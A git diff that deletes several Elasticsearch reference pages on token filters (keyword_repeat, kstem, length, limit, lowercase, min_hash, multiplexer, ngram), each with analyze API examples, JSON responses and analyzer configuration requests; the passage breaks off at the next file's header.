a/docs/reference/analysis/tokenfilters/keyword-repeat-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/keyword-repeat-tokenfilter.asciidoc deleted file mode 100644 index a68eb4aab4f..00000000000 --- a/docs/reference/analysis/tokenfilters/keyword-repeat-tokenfilter.asciidoc +++ /dev/null @@ -1,402 +0,0 @@ -[[analysis-keyword-repeat-tokenfilter]] -=== Keyword repeat token filter -++++ -Keyword repeat -++++ - -Outputs a keyword version of each token in a stream. These keyword tokens are -not stemmed. - -The `keyword_repeat` filter assigns keyword tokens a `keyword` attribute of -`true`. Stemmer token filters, such as -<> or -<>, skip tokens with a `keyword` -attribute of `true`. - -You can use the `keyword_repeat` filter with a stemmer token filter to output a -stemmed and unstemmed version of each token in a stream. - -[IMPORTANT] -==== -To work properly, the `keyword_repeat` filter must be listed before any stemmer -token filters in the <>. - -Stemming does not affect all tokens. This means streams could contain duplicate -tokens in the same position, even after stemming. - -To remove these duplicate tokens, add the -<> filter after the -stemmer filter in the analyzer configuration. -==== - -The `keyword_repeat` filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/KeywordRepeatFilter.html[KeywordRepeatFilter]. - -[[analysis-keyword-repeat-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `keyword_repeat` -filter to output a keyword and non-keyword version of each token in -`fox running and jumping`. - -To return the `keyword` attribute for these tokens, the analyze API request also -includes the following arguments: - -* `explain`: `true` -* `attributes`: `keyword` - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat" - ], - "text": "fox running and jumping", - "explain": true, - "attributes": "keyword" -} ----- - -The API returns the following response. Note that one version of each token has -a `keyword` attribute of `true`. - -.**Response** -[%collapsible] -==== -[source,console-result] ----- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": ..., - "tokenfilters": [ - { - "name": "keyword_repeat", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": true - }, - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": false - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": true - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": true - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": false - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": false - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"tokenizer": \.\.\./"tokenizer": $body.detail.tokenizer/] -==== - -To stem the non-keyword tokens, add the `stemmer` filter after the -`keyword_repeat` filter in the previous analyze API request. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat", - "stemmer" - ], - "text": "fox running and jumping", - "explain": true, - "attributes": "keyword" -} ----- - -The API returns the following response. Note the following changes: - -* The non-keyword version of `running` was stemmed to `run`. -* The non-keyword version of `jumping` was stemmed to `jump`. - -.**Response** -[%collapsible] -==== -[source,console-result] ----- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": ..., - "tokenfilters": [ - { - "name": "keyword_repeat", - "tokens": ... - }, - { - "name": "stemmer", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": true - }, - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": false - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": true - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": true - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": false - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - }, - { - "token": "jump", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": false - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"tokenizer": \.\.\./"tokenizer": $body.detail.tokenizer/] -// TESTRESPONSE[s/"tokens": .../"tokens": $body.$_path/] -==== - -However, the keyword and non-keyword versions of `fox` and `and` are -identical and in the same respective positions. - -To remove these duplicate tokens, add the `remove_duplicates` filter after -`stemmer` in the analyze API request. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat", - "stemmer", - "remove_duplicates" - ], - "text": "fox running and jumping", - "explain": true, - "attributes": "keyword" -} ----- - -The API returns the following response. Note that the duplicate tokens for `fox` -and `and` have been removed. - -.**Response** -[%collapsible] -==== -[source,console-result] ----- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": ..., - "tokenfilters": [ - { - "name": "keyword_repeat", - "tokens": ... - }, - { - "name": "stemmer", - "tokens": ... - }, - { - "name": "remove_duplicates", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": true - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": true - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": true - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - }, - { - "token": "jump", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": false - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"tokenizer": \.\.\./"tokenizer": $body.detail.tokenizer/] -// TESTRESPONSE[s/"tokens": .../"tokens": $body.$_path/] -==== - -[[analysis-keyword-repeat-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`keyword_repeat` filter to configure a new <>. - -This custom analyzer uses the `keyword_repeat` and `porter_stem` filters to -create a stemmed and unstemmed version of each token in a stream. The -`remove_duplicates` filter then removes any duplicate tokens from the stream. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "tokenizer": "standard", - "filter": [ - "keyword_repeat", - "porter_stem", - "remove_duplicates" - ] - } - } - } - } -} ----- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/kstem-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/kstem-tokenfilter.asciidoc deleted file mode 100644 index 2741a568ab3..00000000000 --- a/docs/reference/analysis/tokenfilters/kstem-tokenfilter.asciidoc +++ /dev/null @@ -1,115 +0,0 @@ -[[analysis-kstem-tokenfilter]] -=== KStem token filter -++++ -KStem -++++ - -Provides https://ciir.cs.umass.edu/pubfiles/ir-35.pdf[KStem]-based stemming for -the English language. The `kstem` filter combines -<> with a built-in -<>. - -The `kstem` filter tends to stem less aggressively than other English stemmer -filters, such as the <> filter. - -The `kstem` filter is equivalent to the -<> filter's -<> variant. - -This filter uses Lucene's -{lucene-analysis-docs}/en/KStemFilter.html[KStemFilter]. - -[[analysis-kstem-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `kstem` filter to stem `the foxes -jumping quickly` to `the fox jump quick`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ "kstem" ], - "text": "the foxes jumping quickly" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ the, fox, jump, quick ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 4, - "end_offset": 9, - "type": "", - "position": 1 - }, - { - "token": "jump", - "start_offset": 10, - "end_offset": 17, - "type": "", - "position": 2 - }, - { - "token": "quick", - "start_offset": 18, - "end_offset": 25, - "type": "", - "position": 3 - } - ] -} ----- -//// - -[[analysis-kstem-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`kstem` filter to configure a new <>. - -[IMPORTANT] -==== -To work properly, the `kstem` filter requires lowercase tokens. To ensure tokens -are lowercased, add the <> filter -before the `kstem` filter in the analyzer configuration. -==== - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "whitespace", - "filter": [ - "lowercase", - "kstem" - ] - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/length-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/length-tokenfilter.asciidoc deleted file mode 100644 index 4eced2d39b1..00000000000 --- a/docs/reference/analysis/tokenfilters/length-tokenfilter.asciidoc +++ /dev/null @@ -1,170 +0,0 @@ -[[analysis-length-tokenfilter]] -=== Length token filter -++++ -Length -++++ - -Removes tokens shorter or longer than specified character lengths. -For example, you can use the `length` filter to exclude tokens shorter than 2 -characters and tokens longer than 5 characters. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/LengthFilter.html[LengthFilter]. - -[TIP] -==== -The `length` filter removes entire tokens. If you'd prefer to shorten tokens to -a specific length, use the <> filter. -==== - -[[analysis-length-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `length` -filter to remove tokens longer than 4 characters: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "length", - "min": 0, - "max": 4 - } - ], - "text": "the quick brown fox jumps over the lazy dog" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, fox, over, the, lazy, dog ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "fox", - "start_offset": 16, - "end_offset": 19, - "type": "word", - "position": 3 - }, - { - "token": "over", - "start_offset": 26, - "end_offset": 30, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 31, - "end_offset": 34, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 35, - "end_offset": 39, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 40, - "end_offset": 43, - "type": "word", - "position": 8 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-length-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`length` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT length_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_length": { - "tokenizer": "standard", - "filter": [ "length" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-length-tokenfilter-configure-parms]] -==== Configurable parameters - -`min`:: -(Optional, integer) -Minimum character length of a token. Shorter tokens are excluded from the -output. Defaults to `0`. - -`max`:: -(Optional, integer) -Maximum character length of a token. Longer tokens are excluded from the output. -Defaults to `Integer.MAX_VALUE`, which is `2^31-1` or `2147483647`. - -[[analysis-length-tokenfilter-customize]] -==== Customize - -To customize the `length` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `length` filter that removes -tokens shorter than 2 characters and tokens longer than 10 characters: - -[source,console] --------------------------------------------------- -PUT length_custom_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_length_2_to_10_char": { - "tokenizer": "whitespace", - "filter": [ "length_2_to_10_char" ] - } - }, - "filter": { - "length_2_to_10_char": { - "type": "length", - "min": 2, - "max": 10 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/limit-token-count-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/limit-token-count-tokenfilter.asciidoc deleted file mode 100644 index e06cba7871b..00000000000 --- a/docs/reference/analysis/tokenfilters/limit-token-count-tokenfilter.asciidoc +++ /dev/null @@ -1,143 +0,0 @@ -[[analysis-limit-token-count-tokenfilter]] -=== Limit token count token filter -++++ -Limit token count -++++ - -Limits the number of output tokens. The `limit` filter is commonly used to limit -the size of document field values based on token count. - -By default, the `limit` filter keeps only the first token in a stream. For -example, the filter can change the token stream `[ one, two, three ]` to -`[ one ]`. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/LimitTokenCountFilter.html[LimitTokenCountFilter]. - -[TIP] -==== - If you want to limit the size of field values based on -_character length_, use the <> mapping parameter. -==== - -[[analysis-limit-token-count-tokenfilter-configure-parms]] -==== Configurable parameters - -`max_token_count`:: -(Optional, integer) -Maximum number of tokens to keep. Once this limit is reached, any remaining -tokens are excluded from the output. Defaults to `1`. - -`consume_all_tokens`:: -(Optional, Boolean) -If `true`, the `limit` filter exhausts the token stream, even if the -`max_token_count` has already been reached. Defaults to `false`. - -[[analysis-limit-token-count-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `limit` -filter to keep only the first two tokens in `quick fox jumps over lazy dog`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "limit", - "max_token_count": 2 - } - ], - "text": "quick fox jumps over lazy dog" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ quick, fox ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 6, - "end_offset": 9, - "type": "", - "position": 1 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-limit-token-count-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`limit` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT limit_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_one_token_limit": { - "tokenizer": "standard", - "filter": [ "limit" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-limit-token-count-tokenfilter-customize]] -==== Customize - -To customize the `limit` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `limit` filter that keeps -only the first five tokens of a stream: - -[source,console] --------------------------------------------------- -PUT custom_limit_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_five_token_limit": { - "tokenizer": "whitespace", - "filter": [ "five_token_limit" ] - } - }, - "filter": { - "five_token_limit": { - "type": "limit", - "max_token_count": 5 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/lowercase-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/lowercase-tokenfilter.asciidoc deleted file mode 100644 index 7d6db987ab9..00000000000 --- a/docs/reference/analysis/tokenfilters/lowercase-tokenfilter.asciidoc +++ /dev/null @@ -1,152 +0,0 @@ -[[analysis-lowercase-tokenfilter]] -=== Lowercase token filter -++++ -Lowercase -++++ - -Changes token text to lowercase. For example, you can use the `lowercase` filter -to change `THE Lazy DoG` to `the lazy dog`. - -In addition to a default filter, the `lowercase` token filter provides access to -Lucene's language-specific lowercase filters for Greek, Irish, and Turkish. - -[[analysis-lowercase-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the default -`lowercase` filter to change the `THE Quick FoX JUMPs` to lowercase: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "standard", - "filter" : ["lowercase"], - "text" : "THE Quick FoX JUMPs" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, quick, fox, jumps ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "quick", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "fox", - "start_offset" : 10, - "end_offset" : 13, - "type" : "", - "position" : 2 - }, - { - "token" : "jumps", - "start_offset" : 14, - "end_offset" : 19, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-lowercase-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`lowercase` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT lowercase_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_lowercase": { - "tokenizer": "whitespace", - "filter": [ "lowercase" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-lowercase-tokenfilter-configure-parms]] -==== Configurable parameters - -`language`:: -+ --- -(Optional, string) -Language-specific lowercase token filter to use. Valid values include: - -`greek`::: Uses Lucene's -{lucene-analysis-docs}/el/GreekLowerCaseFilter.html[GreekLowerCaseFilter] - -`irish`::: Uses Lucene's -{lucene-analysis-docs}/ga/IrishLowerCaseFilter.html[IrishLowerCaseFilter] - -`turkish`::: Uses Lucene's -{lucene-analysis-docs}/tr/TurkishLowerCaseFilter.html[TurkishLowerCaseFilter] - -If not specified, defaults to Lucene's -{lucene-analysis-docs}/core/LowerCaseFilter.html[LowerCaseFilter]. --- - -[[analysis-lowercase-tokenfilter-customize]] -==== Customize - -To customize the `lowercase` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `lowercase` filter for the -Greek language: - -[source,console] --------------------------------------------------- -PUT custom_lowercase_example -{ - "settings": { - "analysis": { - "analyzer": { - "greek_lowercase_example": { - "type": "custom", - "tokenizer": "standard", - "filter": ["greek_lowercase"] - } - }, - "filter": { - "greek_lowercase": { - "type": "lowercase", - "language": "greek" - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/minhash-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/minhash-tokenfilter.asciidoc deleted file mode 100644 index bfbf59908ea..00000000000 --- a/docs/reference/analysis/tokenfilters/minhash-tokenfilter.asciidoc +++ /dev/null @@ -1,180 +0,0 @@ -[[analysis-minhash-tokenfilter]] -=== MinHash token filter -++++ -MinHash -++++ - -Uses the {wikipedia}/MinHash[MinHash] technique to produce a -signature for a token stream. You can use MinHash signatures to estimate the -similarity of documents. See <>. - -The `min_hash` filter performs the following operations on a token stream in -order: - -. Hashes each token in the stream. -. Assigns the hashes to buckets, keeping only the smallest hashes of each - bucket. -. Outputs the smallest hash from each bucket as a token stream. - -This filter uses Lucene's -{lucene-analysis-docs}/minhash/MinHashFilter.html[MinHashFilter]. - -[[analysis-minhash-tokenfilter-configure-parms]] -==== Configurable parameters - -`bucket_count`:: -(Optional, integer) -Number of buckets to which hashes are assigned. Defaults to `512`. - -`hash_count`:: -(Optional, integer) -Number of ways to hash each token in the stream. Defaults to `1`. - -`hash_set_size`:: -(Optional, integer) -Number of hashes to keep from each bucket. Defaults to `1`. -+ -Hashes are retained by ascending size, starting with the bucket's smallest hash -first. - -`with_rotation`:: -(Optional, Boolean) -If `true`, the filter fills empty buckets with the value of the first non-empty -bucket to its circular right if the `hash_set_size` is `1`. If the -`bucket_count` argument is greater than `1`, this parameter defaults to `true`. -Otherwise, this parameter defaults to `false`. - -[[analysis-minhash-tokenfilter-configuration-tips]] -==== Tips for configuring the `min_hash` filter - -* `min_hash` filter input tokens should typically be k-words shingles produced -from <>. You should -choose `k` large enough so that the probability of any given shingle -occurring in a document is low. At the same time, as -internally each shingle is hashed into to 128-bit hash, you should choose -`k` small enough so that all possible -different k-words shingles can be hashed to 128-bit hash with -minimal collision. - -* We recommend you test different arguments for the `hash_count`, `bucket_count` and - `hash_set_size` parameters: - -** To improve precision, increase the `bucket_count` or - `hash_set_size` arguments. Higher `bucket_count` and `hash_set_size` values - increase the likelihood that different tokens are indexed to different - buckets. - -** To improve the recall, increase the value of the `hash_count` argument. For - example, setting `hash_count` to `2` hashes each token in two different ways, - increasing the number of potential candidates for search. - -* By default, the `min_hash` filter produces 512 tokens for each document. Each -token is 16 bytes in size. This means each document's size will be increased by -around 8Kb. - -* The `min_hash` filter is used for Jaccard similarity. This means -that it doesn't matter how many times a document contains a certain token, -only that if it contains it or not. - -[[analysis-minhash-tokenfilter-similarity-search]] -==== Using the `min_hash` token filter for similarity search - -The `min_hash` token filter allows you to hash documents for similarity search. -Similarity search, or nearest neighbor search is a complex problem. -A naive solution requires an exhaustive pairwise comparison between a query -document and every document in an index. This is a prohibitive operation -if the index is large. A number of approximate nearest neighbor search -solutions have been developed to make similarity search more practical and -computationally feasible. One of these solutions involves hashing of documents. - -Documents are hashed in a way that similar documents are more likely -to produce the same hash code and are put into the same hash bucket, -while dissimilar documents are more likely to be hashed into -different hash buckets. This type of hashing is known as -locality sensitive hashing (LSH). - -Depending on what constitutes the similarity between documents, -various LSH functions https://arxiv.org/abs/1408.2927[have been proposed]. -For {wikipedia}/Jaccard_index[Jaccard similarity], a popular -LSH function is {wikipedia}/MinHash[MinHash]. -A general idea of the way MinHash produces a signature for a document -is by applying a random permutation over the whole index vocabulary (random -numbering for the vocabulary), and recording the minimum value for this permutation -for the document (the minimum number for a vocabulary word that is present -in the document). The permutations are run several times; -combining the minimum values for all of them will constitute a -signature for the document. - -In practice, instead of random permutations, a number of hash functions -are chosen. A hash function calculates a hash code for each of a -document's tokens and chooses the minimum hash code among them. -The minimum hash codes from all hash functions are combined -to form a signature for the document. - -[[analysis-minhash-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `min_hash` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses the following custom token filters to configure a new -<>: - -* `my_shingle_filter`, a custom <>. `my_shingle_filter` only outputs five-word shingles. -* `my_minhash_filter`, a custom `min_hash` filter. `my_minhash_filter` hashes - each five-word shingle once. It then assigns the hashes into 512 buckets, - keeping only the smallest hash from each bucket. - -The request also assigns the custom analyzer to the `fingerprint` field mapping. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "filter": { - "my_shingle_filter": { <1> - "type": "shingle", - "min_shingle_size": 5, - "max_shingle_size": 5, - "output_unigrams": false - }, - "my_minhash_filter": { - "type": "min_hash", - "hash_count": 1, <2> - "bucket_count": 512, <3> - "hash_set_size": 1, <4> - "with_rotation": true <5> - } - }, - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ - "my_shingle_filter", - "my_minhash_filter" - ] - } - } - } - }, - "mappings": { - "properties": { - "fingerprint": { - "type": "text", - "analyzer": "my_analyzer" - } - } - } -} ----- - -<1> Configures a custom shingle filter to output only five-word shingles. -<2> Each five-word shingle in the stream is hashed once. -<3> The hashes are assigned to 512 buckets. -<4> Only the smallest hash in each bucket is retained. -<5> The filter fills empty buckets with the values of neighboring buckets. diff --git a/docs/reference/analysis/tokenfilters/multiplexer-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/multiplexer-tokenfilter.asciidoc deleted file mode 100644 index 178f42d3b9f..00000000000 --- a/docs/reference/analysis/tokenfilters/multiplexer-tokenfilter.asciidoc +++ /dev/null @@ -1,123 +0,0 @@ -[[analysis-multiplexer-tokenfilter]] -=== Multiplexer token filter -++++ -Multiplexer -++++ - -A token filter of type `multiplexer` will emit multiple tokens at the same position, -each version of the token having been run through a different filter. Identical -output tokens at the same position will be removed. - -WARNING: If the incoming token stream has duplicate tokens, then these will also be -removed by the multiplexer - -[discrete] -=== Options -[horizontal] -filters:: a list of token filters to apply to incoming tokens. These can be any - token filters defined elsewhere in the index mappings. Filters can be chained - using a comma-delimited string, so for example `"lowercase, porter_stem"` would - apply the `lowercase` filter and then the `porter_stem` filter to a single token. - -WARNING: <> or multi-word synonym token filters will not function normally - when they are declared in the filters array because they read ahead internally - which is unsupported by the multiplexer - -preserve_original:: if `true` (the default) then emit the original token in - addition to the filtered tokens - - -[discrete] -=== Settings example - -You can set it up like: - -[source,console] --------------------------------------------------- -PUT /multiplexer_example -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "my_multiplexer" ] - } - }, - "filter": { - "my_multiplexer": { - "type": "multiplexer", - "filters": [ "lowercase", "lowercase, porter_stem" ] - } - } - } - } -} --------------------------------------------------- - -And test it like: - -[source,console] --------------------------------------------------- -POST /multiplexer_example/_analyze -{ - "analyzer" : "my_analyzer", - "text" : "Going HOME" -} --------------------------------------------------- -// TEST[continued] - -And it'd respond: - -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "Going", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "going", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "go", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "HOME", - "start_offset": 6, - "end_offset": 10, - "type": "", - "position": 1 - }, - { - "token": "home", <1> - "start_offset": 6, - "end_offset": 10, - "type": "", - "position": 1 - } - ] -} --------------------------------------------------- - -<1> The stemmer has also emitted a token `home` at position 1, but because it is a -duplicate of this token it has been removed from the token stream - -NOTE: The synonym and synonym_graph filters use their preceding analysis chain to -parse and analyse their synonym lists, and will throw an exception if that chain -contains token filters that produce multiple tokens at the same position. -If you want to apply synonyms to a token stream containing a multiplexer, then you -should append the synonym filter to each relevant multiplexer filter list, rather than -placing it after the multiplexer in the main token chain definition. diff --git a/docs/reference/analysis/tokenfilters/ngram-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/ngram-tokenfilter.asciidoc deleted file mode 100644 index fc6aea3d069..00000000000 --- a/docs/reference/analysis/tokenfilters/ngram-tokenfilter.asciidoc +++ /dev/null @@ -1,232 +0,0 @@ -[[analysis-ngram-tokenfilter]] -=== N-gram token filter -++++ -N-gram -++++ - -Forms {wikipedia}/N-gram[n-grams] of specified lengths from -a token. - -For example, you can use the `ngram` token filter to change `fox` to -`[ f, fo, o, ox, x ]`. - -This filter uses Lucene's -{lucene-analysis-docs}/ngram/NGramTokenFilter.html[NGramTokenFilter]. - -[NOTE] -==== -The `ngram` filter is similar to the -<>. However, the -`edge_ngram` only outputs n-grams that start at the beginning of a token. -==== - -[[analysis-ngram-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `ngram` -filter to convert `Quick fox` to 1-character and 2-character n-grams: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ "ngram" ], - "text": "Quick fox" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ Q, Qu, u, ui, i, ic, c, ck, k, f, fo, o, ox, x ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "Q", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "Qu", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "u", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "ui", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "i", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "ic", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "c", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "ck", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "k", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "f", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "fo", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "o", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "ox", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "x", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-ngram-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the `ngram` -filter to configure a new <>. - -[source,console] --------------------------------------------------- -PUT ngram_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_ngram": { - "tokenizer": "standard", - "filter": [ "ngram" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-ngram-tokenfilter-configure-parms]] -==== Configurable parameters - -`max_gram`:: -(Optional, integer) -Maximum length of characters in a gram. Defaults to `2`. - -`min_gram`:: -(Optional, integer) -Minimum length of characters in a gram. Defaults to `1`. - -`preserve_original`:: -(Optional, Boolean) -Emits original token when set to `true`. Defaults to `false`. - -You can use the <> index-level -setting to control the maximum allowed difference between the `max_gram` and -`min_gram` values. - -[[analysis-ngram-tokenfilter-customize]] -==== Customize - -To customize the `ngram` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `ngram` filter that forms -n-grams between 3-5 characters. The request also increases the -`index.max_ngram_diff` setting to `2`. - -[source,console] --------------------------------------------------- -PUT ngram_custom_example -{ - "settings": { - "index": { - "max_ngram_diff": 2 - }, - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "3_5_grams" ] - } - }, - "filter": { - "3_5_grams": { - "type": "ngram", - "min_gram": 3, - "max_gram": 5 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/normalization-tokenfilter.asciidoc 